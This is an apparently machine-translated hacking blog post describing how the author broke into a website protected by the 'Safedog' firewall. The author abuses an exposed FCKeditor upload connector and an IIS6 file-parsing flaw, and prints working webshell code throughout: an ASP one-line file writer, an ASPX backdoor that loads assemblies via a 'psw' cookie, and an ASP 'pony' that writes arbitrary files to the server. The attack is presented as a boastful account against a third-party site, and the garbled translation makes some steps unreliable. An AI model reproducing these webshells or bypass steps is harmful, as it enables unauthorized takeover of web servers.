Experience on FCK upload bypassing dongle

Dongle is really a very spam program. As a security protection software, dongle is not safe. This is what I said. The product of a technical team is directly linked to the technical strength of this team. This address comes from a friend on QQ. In fact, I didn't want to read this address, but I have heard of the Bad Name of the dongle for a long time. Today, I have never heard of it as much as a dozen. I should beat it if I am not specialized in technology or skillful in learning. http://www.bkjia.com The browser of the/fckeditor/editor/filemanager/connectors/test.html copy code FCKeditor is deleted, but the connector and test pages are all there, so there is no problem.. But access: http://www.bkjia.com /YourUploadFilePath/file/a.asp;(1).gif copy code. A prompt is displayed: Your request has invalid parameters. Thank you for your cooperation! Friendly tips from dongle Internet security lab-website security dog software. For more information, click here, but you can see that the. asp folder has been created. Directly upload an image to the/shell. asp/folder and use the iis6 Parsing Vulnerability to parse it into asp, bypassing the dongle. But I know that a lot of horses can't get on, and the kitchen knife does not have a 403 sentence. You can simply use <% If request ("cmd") <> "" And request ("path") <> "" then Createobject ("Scri" & "pting. fileSys "&" temObject "). createTextFile (server. mappath (request ("path "))). writeLine request ("cmd") %> copy the Code. This is a sentence used by the server to upload files. This sentence can be used in the XI kebing database [Attach. blackBap. org] the asp upload class under the website security classification is a one-sentence ShellClient connection and file upload. In addition to this tool, the "ASPX shell client in one sentence" tool can also bypass the dongle perfectly. The aspx server is: <% @ Page Language = "C #" ValidateRequest = "false" %> <% try {System. reflection. assembly. load (Request. binaryRead (int. parse (Request. cookies ["psw"]. value ))). createInstance ("c", true, System. reflection. bindingFlags. default, null, new object [] {this}, null, null);} catch {}%> the copy code password is psw, but now the upload backdoor is in/shell. asp/This directory. If the name of aspx is 500, it is not parsed. If it is a plus sign, it is useless to aspx. In the "new backdoor", if you write xxx. asp, xxx. asa, xxx. cer is okay, but upload .. /xxx. aspx transfers the directory to/shell. asp/the folder will fail. Think about how to write the aspx backdoor to/shell. asp/directory. I used a Pony: <% dim objFSO dim fdata dim objCountFile on error resume next Set objFSO = Server. createObject ("Scripting. fileSystemObject ") if Trim (request (" systempath ") <>" "then fdata = request (" sAvedata ") Set objCountFile = objFSO. createTextFile (request ("systempath"), True) objCountFile. write fdata if err = 0 then response. write "<font color = red> saved successfully! </Font> "else response. write" <font color = red> failed to save! </Font> "end if err. clear end if objCountFile. close Set objCountFile = Nothing Set objFSO = Nothing Response. write "<form action ='' method = post> "Response. write "Save the <font color = red> absolute path of the file (including the file name, for example, D: \ web \ x. asp): </font> "Response. write "<input type = text name = systempath width = 32 size = 50>" Response. write "<br>" Response. write "absolute path of this file" Response. write server. mappath (Request. serverVariables ("SCRIPT_NAME ")) Response. write "<br>" Response. write "content of the input horse:" Response. write "<textarea name = sAvedata cols = 80 rows = 10 width = 32> </textarea>" Response. write "<input type = submit value = save>" Response. write "</form>" %> copy the code to write the aspx horse to the outside. asp upload will prompt that the dangerous parameter cannot be uploaded, but it will be okay if you use this aspx. The website path is: E: \ website program \ rsc \. Unfortunately, this aspx client does not support the Chinese path. This problem can also be solved. Check: just copy the command in cmd. Asp makes it easy to run without pressure. I have never been defeated by a Dongle for this website. Some things are just paper tigers.